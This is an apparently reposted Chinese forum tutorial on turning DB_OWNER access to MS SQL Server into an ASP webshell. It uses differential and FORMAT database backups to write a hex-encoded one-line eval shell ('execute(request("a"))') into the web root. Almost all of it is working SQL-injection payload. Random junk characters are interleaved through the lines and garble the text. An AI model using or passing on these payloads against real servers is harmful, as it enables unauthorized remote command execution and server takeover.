DB_OWNER权限得到webshell的改进办法

admin

DB_OWNER权限得到webshell的两点改进:
' l% b4 A! W0 D2 s9 P8 N
4 m! c6 ?: ~# R% |& i( N1 O1 N' u1 _减少备份文件大小，得到可执行的webshell成功率提高不少
$ f- E/ C& V# E9 {/ k6 X一利用差异备份
加一个参数WITH DIFFERENTIAL
0 A( q" P/ `" k( g/ ?4 K! e
5 z9 ?  ~2 i8 K: ?9 U) y7 |5 J1
2
7 Q9 a; \( V- |: b1 \- j9 i0 [3
( ~0 s, x$ l2 u3 Y0 }5 [4
7 t2 z% B% i& ~8 E2 v declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
4 N' R4 D$ K& Ccreate table [dbo].[xiaolu] ([cmd] [image]);
insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL
9 L4 Z6 s, c3 C1 C" Z; v$ I
" Y; b% Y* l$ l) P) O! D二利用完全FORMAT
加一个参数WITH FROMAT
有些页面对数据库要执行几次，而备份又默认是每次都以追加的方式，如果一个注入点对数据库有几次操作，而备份的文件就 几倍的增加，所以

1 w* {  |& w. D& c* O1
+ b  z4 @0 _0 ~$ h5 Z2
3
4
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
  y3 K2 j$ U* {' l1 n9 w( rcreate table [dbo].[xiaolu] ([cmd] [image]);
% t+ Y# ~! f. G/ W$ L  ~insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
7 _: ]- X5 O* Q9 E8 V( d% qdeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH FORMAT
1 B, S" k/ N1 h! w2 X6 t
总的来说就是那么简单几句,下面以备份数据库model为例子
$ {9 R# d0 V' `3 K1
$ \; {1 _' h, `0 ?' F9 l7 a
1
$ b% j2 E- v6 T7 d5 I id=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>')
! {  A0 v3 m' \6 ^- I6 i. Y8 O) S/ V* Z# D
  h7 x9 v' ^, H4 ^2

1
8 r- J* n9 `, f  Q& R" q id=1;backup database model to disk='你的路径‘ with differential,format;--